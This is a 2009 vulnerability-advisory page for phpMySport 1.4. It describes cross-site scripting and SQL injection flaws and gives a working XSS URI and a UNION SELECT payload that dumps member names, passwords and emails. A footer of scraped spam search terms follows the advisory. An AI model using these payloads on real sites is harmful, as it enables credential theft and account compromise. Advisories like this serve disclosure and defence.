about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PhpMySport Multiple Cross Site Scripting and SQL Injection Vulnerabilities


Title PhpMySport Multiple Cross Site Scripting and SQL Injection Vulnerabilities
Published 2009-03-12-12:00AM
Updated 2009-03-12-07:26PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  XaDoS
Vulnerable  phpMySport phpMySport 1.4
Not Vulnerable  
Code  An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.The following examples are available:
http://www.example.com/index.php?r=competition&v1=view&v2=1&v3=1&v4=&v5=all&v6=[XSS]http://www.example.com/phpmysport/index.php?r=membro&v1=member_listWrite in the search_member form the right query:999'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat(member_firstname,0x3a,member_pass,0x3a,member_email),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/**/from/**/pms_member#
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 03 Dec 2009 21:13:29 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Tamilsexyp shexian.ha j..._linkd www+humar+ pblforum www.wzbssg apache aut Www.sexmov Wib+Wize+f 1.3.31 200 /compo /search/ex WWW.PORNO. MySQL 3.23 200 /compo news for c animal sex solaris 8. 3gp sex mo news for c /search/ex www.hongse CMS is Fre Nude Sania nokia 6600 Indian sex php-nuke 2 WWW SCHOOL Happy tree smartschoo sexy black 200 /compo Crack Data www.592flo Hot Hindu scary maze WWW.DOMAIN sex vedeuo www.trish Nacked vid 200 /compo 200 /compo vBulletin BEFVP41 SupperMari www.pk2010 taskhopper News Searc www.shenzh 200 /compo